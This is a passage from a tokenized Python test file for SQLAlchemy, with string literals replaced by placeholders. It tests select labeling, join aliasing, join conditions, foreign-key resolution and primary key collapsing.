<EOL> assert j4 . corresponding_column ( a . c . id ) is j4 . c . id <EOL> def test_two_metadata_join_raises ( self ) : <EOL> m = MetaData ( ) <EOL> m2 = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) , Column ( '<STR_LIT>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t3 = Table ( '<STR_LIT>' , m2 , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> s = select ( [ t2 , t3 ] , use_labels = True ) <EOL> assert_raises ( exc . NoReferencedTableError , s . join , t1 ) <EOL> def test_multi_label_chain_naming_col ( self ) : <EOL> l1 = table1 . c . col1 . label ( '<STR_LIT:a>' ) <EOL> l2 = select ( [ l1 ] ) . label ( '<STR_LIT:b>' ) <EOL> s = select ( [ l2 ] ) <EOL> assert s . c . b is not None <EOL> self . assert_compile ( <EOL> s . select ( ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> s2 = select ( [ s . label ( '<STR_LIT:c>' ) ] ) <EOL> self . assert_compile ( <EOL> s2 . select ( ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_self_referential_select_raises ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:x>' ) ) <EOL> s = select ( [ t ] ) <EOL> s . append_whereclause ( s . c . x > <NUM_LIT:5> ) <EOL> assert_raises_message ( <EOL> exc . InvalidRequestError , <EOL> r"<STR_LIT>" , <EOL> s . compile <EOL> ) <EOL> def test_unusual_column_elements_text ( self ) : <EOL> """<STR_LIT>""" <EOL> s = select ( [ table1 . c . col1 , text ( "<STR_LIT:foo>" ) ] ) <EOL> eq_ ( <EOL> list ( s . c ) , <EOL> [ s . c . col1 ] <EOL> ) <EOL> def test_unusual_column_elements_clauselist ( self ) : <EOL> """<STR_LIT>""" <EOL> from sqlalchemy . sql . expression import ClauseList <EOL> s = select ( [ table1 . c . col1 , ClauseList ( table1 . c . col2 , table1 . c . col3 ) ] ) <EOL> eq_ ( <EOL> list ( s . c ) , <EOL> [ s . c . col1 , s . c . col2 , s . c . col3 ] <EOL> ) <EOL> def test_unusual_column_elements_boolean_clauselist ( self ) : <EOL> """<STR_LIT>""" <EOL> c2 = and_ ( table1 . c . col2 == <NUM_LIT:5> , table1 . c . col3 == <NUM_LIT:4> ) <EOL> s = select ( [ table1 . c . col1 , c2 ] ) <EOL> eq_ ( <EOL> list ( s . c ) , <EOL> [ s . c . col1 , s . corresponding_column ( c2 ) ] <EOL> ) <EOL> def test_from_list_deferred_constructor ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> c2 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c1 , c2 ) <EOL> eq_ ( c1 . _from_objects , [ t ] ) <EOL> eq_ ( c2 . _from_objects , [ t ] ) <EOL> self . assert_compile ( select ( [ c1 ] ) , <EOL> "<STR_LIT>" ) <EOL> self . assert_compile ( select ( [ c2 ] ) , <EOL> "<STR_LIT>" ) <EOL> def test_from_list_deferred_whereclause ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> c2 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) . where ( c1 == <NUM_LIT:5> ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c1 , c2 ) <EOL> eq_ ( c1 . _from_objects , [ t ] ) <EOL> eq_ ( c2 . _from_objects , [ t ] ) <EOL> self . assert_compile ( select ( [ c1 ] ) , <EOL> "<STR_LIT>" ) <EOL> self . assert_compile ( select ( [ c2 ] ) , <EOL> "<STR_LIT>" ) <EOL> def test_from_list_deferred_fromlist ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) . where ( c1 == <NUM_LIT:5> ) . select_from ( t1 ) <EOL> t2 = Table ( '<STR_LIT>' , MetaData ( ) , c1 ) <EOL> eq_ ( c1 . _from_objects , [ t2 ] ) <EOL> self . assert_compile ( select ( [ c1 ] ) , <EOL> "<STR_LIT>" ) <EOL> def test_from_list_deferred_cloning ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> c2 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) <EOL> s2 = select ( [ c2 ] ) <EOL> s3 = sql_util . ClauseAdapter ( s ) . traverse ( s2 ) <EOL> Table ( '<STR_LIT:t>' , MetaData ( ) , c1 , c2 ) <EOL> self . assert_compile ( <EOL> s3 , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_from_list_with_columns ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( '<STR_LIT:a>' ) ) <EOL> table2 = table ( '<STR_LIT>' , column ( '<STR_LIT:b>' ) ) <EOL> s1 = select ( [ table1 . c . a , table2 . c . b ] ) <EOL> self . assert_compile ( s1 , <EOL> "<STR_LIT>" <EOL> ) <EOL> s2 = s1 . with_only_columns ( [ table2 . c . b ] ) <EOL> self . assert_compile ( s2 , <EOL> "<STR_LIT>" <EOL> ) <EOL> s3 = sql_util . ClauseAdapter ( table1 ) . traverse ( s1 ) <EOL> self . assert_compile ( s3 , <EOL> "<STR_LIT>" <EOL> ) <EOL> s4 = s3 . with_only_columns ( [ table2 . c . b ] ) <EOL> self . assert_compile ( s4 , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_from_list_warning_against_existing ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) <EOL> self . assert_compile ( <EOL> s , <EOL> "<STR_LIT>" <EOL> ) <EOL> Table ( '<STR_LIT:t>' , MetaData ( ) , c1 ) <EOL> self . assert_compile ( <EOL> s , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_from_list_recovers_after_warning ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> c2 = Column ( '<STR_LIT>' , Integer ) <EOL> s = select ( [ c1 ] ) <EOL> eq_ ( str ( s ) , "<STR_LIT>" ) <EOL> @ testing . emits_warning ( ) <EOL> def go ( ) : <EOL> return Table ( '<STR_LIT:t>' , MetaData ( ) , c1 , c2 ) <EOL> t = go ( ) <EOL> eq_ ( c1 . _from_objects , [ t ] ) <EOL> eq_ ( c2 . _from_objects , [ t ] ) <EOL> self . assert_compile ( s , "<STR_LIT>" ) <EOL> self . assert_compile ( select ( [ c1 ] ) , "<STR_LIT>" ) <EOL> self . assert_compile ( select ( [ c2 ] ) , "<STR_LIT>" ) <EOL> def test_label_gen_resets_on_table ( self ) : <EOL> c1 = Column ( '<STR_LIT>' , Integer ) <EOL> eq_ ( c1 . _label , "<STR_LIT>" ) <EOL> Table ( '<STR_LIT>' , MetaData ( ) , c1 ) <EOL> eq_ ( c1 . _label , "<STR_LIT>" ) <EOL> class RefreshForNewColTest ( fixtures . TestBase ) : <EOL> def test_join_uninit ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) <EOL> q = column ( '<STR_LIT:q>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . b_q is q <EOL> def test_join_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) <EOL> j . c <EOL> q = column ( '<STR_LIT:q>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . b_q is q <EOL> def test_join_samename_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) <EOL> j . c <EOL> q = column ( '<STR_LIT:x>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . b_x is q <EOL> def test_select_samename_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> s = select ( [ a , b ] ) . apply_labels ( ) <EOL> s . c <EOL> q = column ( '<STR_LIT:x>' ) <EOL> b . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert q in s . c . b_x . proxy_set <EOL> def test_aliased_select_samename_uninit ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> s = select ( [ a , b ] ) . apply_labels ( ) . alias ( ) <EOL> q = column ( '<STR_LIT:x>' ) <EOL> b . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert q in s . c . b_x . proxy_set <EOL> def test_aliased_select_samename_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> s = select ( [ a , b ] ) . apply_labels ( ) . alias ( ) <EOL> s . c <EOL> q = column ( '<STR_LIT:x>' ) <EOL> b . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert q in s . c . b_x . proxy_set <EOL> def test_aliased_select_irrelevant ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:z>' ) ) <EOL> s = select ( [ a , b ] ) . apply_labels ( ) . alias ( ) <EOL> s . c <EOL> q = column ( '<STR_LIT:x>' ) <EOL> c . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert '<STR_LIT>' not in s . c <EOL> def test_aliased_select_no_cols_clause ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> s = select ( [ a . c . x ] ) . apply_labels ( ) . alias ( ) <EOL> s . c <EOL> q = column ( '<STR_LIT:q>' ) <EOL> a . append_column ( q ) <EOL> s . _refresh_for_new_column ( q ) <EOL> assert '<STR_LIT>' not in s . c <EOL> def test_union_uninit ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> s1 = select ( [ a ] ) <EOL> s2 = select ( [ a ] ) <EOL> s3 = s1 . union ( s2 ) <EOL> q = column ( '<STR_LIT:q>' ) <EOL> a . append_column ( q ) <EOL> s3 . _refresh_for_new_column ( q ) <EOL> assert a . c . q in s3 . c . q . proxy_set <EOL> def test_union_init_raises ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> s1 = select ( [ a ] ) <EOL> s2 = select ( [ a ] ) <EOL> s3 = s1 . union ( s2 ) <EOL> s3 . c <EOL> q = column ( '<STR_LIT:q>' ) <EOL> a . append_column ( q ) <EOL> assert_raises_message ( <EOL> NotImplementedError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> s3 . _refresh_for_new_column , q <EOL> ) <EOL> def test_nested_join_uninit ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:z>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) . join ( c , b . c . y == c . c . z ) <EOL> q = column ( '<STR_LIT:q>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . b_q is q <EOL> def test_nested_join_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:z>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) . join ( c , b . c . y == c . c . z ) <EOL> j . c <EOL> q = column ( '<STR_LIT:q>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . b_q is q <EOL> class AnonLabelTest ( fixtures . TestBase ) : <EOL> """<STR_LIT>""" <EOL> def test_anon_labels_named_column ( self ) : <EOL> c1 = column ( '<STR_LIT:x>' ) <EOL> assert c1 . label ( None ) is not c1 <EOL> eq_ ( str ( select ( [ c1 . label ( None ) ] ) ) , "<STR_LIT>" ) <EOL> def test_anon_labels_literal_column ( self ) : <EOL> c1 = literal_column ( '<STR_LIT:x>' ) <EOL> assert c1 . label ( None ) is not c1 <EOL> eq_ ( str ( select ( [ c1 . label ( None ) ] ) ) , "<STR_LIT>" ) <EOL> def test_anon_labels_func ( self ) : <EOL> c1 = func . count ( '<STR_LIT:*>' ) <EOL> assert c1 . label ( None ) is not c1 <EOL> eq_ ( str ( select ( [ c1 ] ) ) , "<STR_LIT>" ) <EOL> c2 = select ( [ c1 ] ) . compile ( ) <EOL> eq_ ( str ( select ( [ c1 . label ( None ) ] ) ) , "<STR_LIT>" ) <EOL> def test_named_labels_named_column ( self ) : <EOL> c1 = column ( '<STR_LIT:x>' ) <EOL> eq_ ( str ( select ( [ c1 . label ( '<STR_LIT:y>' ) ] ) ) , "<STR_LIT>" ) <EOL> def test_named_labels_literal_column ( self ) : <EOL> c1 = literal_column ( '<STR_LIT:x>' ) <EOL> eq_ ( str ( select ( [ c1 . label ( '<STR_LIT:y>' ) ] ) ) , "<STR_LIT>" ) <EOL> class JoinAliasingTest ( fixtures . TestBase , AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_flat_ok_on_non_join ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> s = a . select ( ) <EOL> self . assert_compile ( <EOL> s . alias ( flat = True ) . select ( ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_join_alias ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> self . assert_compile ( <EOL> a . join ( b , a . c . a == b . c . b ) . alias ( ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_join_standalone_alias ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> self . assert_compile ( <EOL> alias ( a . join ( b , a . c . a == b . c . b ) ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_join_alias_flat ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> self . assert_compile ( <EOL> a . join ( b , a . c . a == b . c . b ) . alias ( flat = True ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_join_standalone_alias_flat ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> self . assert_compile ( <EOL> alias ( a . join ( b , a . c . a == b . c . b ) , flat = True ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_composed_join_alias_flat ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:c>' ) ) <EOL> d = table ( '<STR_LIT:d>' , column ( '<STR_LIT:d>' ) ) <EOL> j1 = a . join ( b , a . c . a == b . c . b ) <EOL> j2 = c . join ( d , c . c . c == d . c . d ) <EOL> self . assert_compile ( <EOL> j1 . join ( j2 , b . c . b == c . c . c ) . alias ( flat = True ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_composed_join_alias ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:c>' ) ) <EOL> d = table ( '<STR_LIT:d>' , column ( '<STR_LIT:d>' ) ) <EOL> j1 = a . join ( b , a . c . a == b . c . b ) <EOL> j2 = c . join ( d , c . c . c == d . c . d ) <EOL> self . assert_compile ( <EOL> select ( [ j1 . join ( j2 , b . c . b == c . c . c ) . alias ( ) ] ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class JoinConditionTest ( fixtures . TestBase , AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_join_condition ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT:id>' , Integer ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t3 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT:id>' , Integer ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t4 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t5 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) , <EOL> ) <EOL> t1t2 = t1 . join ( t2 ) <EOL> t2t3 = t2 . join ( t3 ) <EOL> for ( left , right , a_subset , expected ) in [ <EOL> ( t1 , t2 , None , t1 . c . id == t2 . c . t1id ) , <EOL> ( t1t2 , t3 , t2 , t1t2 . c . t2_id == t3 . c . t2id ) , <EOL> ( t2t3 , t1 , t3 , t1 . c . id == t3 . c . t1id ) , <EOL> ( t2t3 , t4 , None , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 , t4 , t3 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 . join ( t1 ) , t4 , None , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 . join ( t1 ) , t4 , t1 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t1t2 , t2t3 , t2 , t1t2 . c . t2_id == t2t3 . c . t3_t2id ) , <EOL> ] : <EOL> assert expected . compare ( <EOL> sql_util . join_condition ( <EOL> left , <EOL> right , <EOL> a_subset = a_subset ) ) <EOL> for left , right , a_subset in [ <EOL> ( t1t2 , t3 , None ) , <EOL> ( t2t3 , t1 , None ) , <EOL> ( t1 , t4 , None ) , <EOL> ( t1t2 , t2t3 , None ) , <EOL> ( t5 , t1 , None ) , <EOL> ( t5 . select ( use_labels = True ) , t1 , None ) <EOL> ] : <EOL> assert_raises ( <EOL> exc . ArgumentError , <EOL> sql_util . join_condition , <EOL> left , right , a_subset = a_subset <EOL> ) <EOL> als = t2t3 . alias ( ) <EOL> for left , right , expected in [ <EOL> ( t1 , t2 , t1 . c . id == t2 . c . t1id ) , <EOL> ( t1t2 , t3 , t1t2 . c . t2_id == t3 . c . t2id ) , <EOL> ( t2t3 , t1 , t1 . c . id == t3 . c . t1id ) , <EOL> ( t2t3 , t4 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 , t4 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 . join ( t1 ) , t4 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 . join ( t1 ) , t4 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t1t2 , als , t1t2 . c . t2_id == als . c . t3_t2id ) <EOL> ] : <EOL> assert expected . compare ( <EOL> left . join ( right ) . onclause <EOL> ) <EOL> j = t1t2 . join ( t2t3 ) <EOL> assert j . onclause . compare ( t2 . c . id == t3 . c . t2id ) <EOL> self . assert_compile ( <EOL> j , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> st2t3 = t2t3 . select ( use_labels = True ) <EOL> j = t1t2 . join ( st2t3 ) <EOL> assert j . onclause . compare ( t2 . c . id == st2t3 . c . t3_t2id ) <EOL> self . assert_compile ( <EOL> j , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_join_multiple_equiv_fks ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> ) <EOL> t2 = Table ( <EOL> '<STR_LIT>' , <EOL> m , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> ForeignKey ( '<STR_LIT>' ) ) ) <EOL> assert sql_util . join_condition ( t1 , t2 ) . compare ( t1 . c . id == t2 . c . t1id ) <EOL> def test_join_cond_no_such_unrelated_table ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT:y>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:q>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> assert sql_util . join_condition ( t1 , t2 ) . compare ( t1 . c . x == t2 . c . id ) <EOL> assert sql_util . join_condition ( t2 , t1 ) . compare ( t1 . c . x == t2 . c . id ) <EOL> def test_join_cond_no_such_unrelated_column ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:y>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> assert sql_util . join_condition ( t1 , t2 ) . compare ( t1 . c . x == t2 . c . id ) <EOL> assert sql_util . join_condition ( t2 , t1 ) . compare ( t1 . c . x == t2 . c . id ) <EOL> def test_join_cond_no_such_related_table ( self ) : <EOL> m1 = MetaData ( ) <EOL> m2 = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m1 , Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , m2 , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> assert_raises_message ( <EOL> exc . NoReferencedTableError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sql_util . join_condition , t1 , t2 <EOL> ) <EOL> assert_raises_message ( <EOL> exc . NoReferencedTableError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sql_util . join_condition , t2 , t1 <EOL> ) <EOL> def test_join_cond_no_such_related_column ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> assert_raises_message ( <EOL> exc . NoReferencedColumnError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sql_util . join_condition , t1 , t2 <EOL> ) <EOL> assert_raises_message ( <EOL> exc . NoReferencedColumnError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sql_util . join_condition , t2 , t1 <EOL> ) <EOL> class PrimaryKeyTest ( fixtures . TestBase , AssertsExecutionResults ) : <EOL> def test_join_pk_collapse_implicit ( self ) : <EOL> """<STR_LIT>""" <EOL> meta = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , meta , Column ( '<STR_LIT:id>' , Integer , primary_key = True ) ) <EOL> b = Table ( '<STR_LIT:b>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> c = Table ( '<STR_LIT:c>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> d = Table ( '<STR_LIT:d>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> assert c . c . id . references ( b . c . id ) <EOL> assert not d . c . id . references ( a . c . id ) <EOL> assert list ( a . join ( b ) . primary_key ) == [ a . c . id ] <EOL> assert list ( b . join ( c ) . primary_key ) == [ b . c . id ] <EOL> assert list ( a . join ( b ) . join ( c ) . primary_key ) == [ a . c . id ] <EOL> assert list ( b . join ( c ) . join ( d ) . primary_key ) == [ b . c . id ] <EOL> assert list ( d . join ( c ) . join ( b ) . primary_key ) == [ b . c . id ] <EOL> assert list ( a . join ( b ) . join ( c ) . join ( d ) . primary_key ) == [ a . c . id ] <EOL> def test_join_pk_collapse_explicit ( self ) : <EOL> """<STR_LIT>""" <EOL> meta = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , meta , Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer ) ) <EOL> b = Table ( '<STR_LIT:b>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> c = Table ( '<STR_LIT:c>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> d = Table ( '<STR_LIT:d>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> print ( list ( a . join ( b , a . c . x == b . c . id ) . primary_key ) ) <EOL> assert list ( a . join ( b , a . c . x == b . c . id ) . primary_key ) == [ a . c . id ] <EOL> assert list ( b . join ( c , b . c . x == c . c . id ) . primary_key ) == [ b . c . id ] <EOL> assert list ( a . join ( b ) . join ( c , c . c . id == b . c . x ) . primary_key ) == [ a . c . id ] <EOL> assert list ( b . join ( c , c . c . x == b . c . id ) . join ( d ) . primary_key ) == [ b . c . id ] <EOL> assert list ( b . join ( c , c . c . id == b . c . x ) . join ( d ) . primary_key ) == [ b . c . id ] <EOL> assert list ( <EOL> d . join ( <EOL> b , <EOL> d . c . id == b . c . id ) . join ( <EOL> c , <EOL> b . c . id == c . c . x ) . primary_key ) == [ <EOL> b . c . id ] <EOL> assert list ( a . join ( b ) . join ( c , c . c . id <EOL> == b . c . x ) . join ( d ) . primary_key ) == [ a . c . id ] <EOL> assert list ( a . join ( b , and_ ( a . c . id == b . c . id , a . c . x <EOL> == b . c . id ) ) . primary_key ) == [ a . c . id ] <EOL> def test_init_doesnt_blowitaway ( self ) : <EOL> meta = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer ) ) <EOL> b = Table ( '<STR_LIT:b>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer ) ) <EOL> j = a . join ( b ) <EOL> assert list ( j . primary_key ) == [ a . c . id ] <EOL> j . foreign_keys <EOL> assert list ( j . primary_key ) == [ a . c . id ] <EOL> def test_non_column_clause ( self ) : <EOL> meta = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer ) ) <EOL> b = Table ( '<STR_LIT:b>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer , primary_key = True ) ) <EOL> j = a . join ( b , and_ ( a . c . id == b . c . id , b . c . x == <NUM_LIT:5> ) ) <EOL> assert str ( j ) == "<STR_LIT>" , str ( j ) <EOL> assert list ( j . primary_key ) == [ a . c . id , b . c . x ] <EOL> def test_onclause_direction ( self ) : <EOL> metadata = 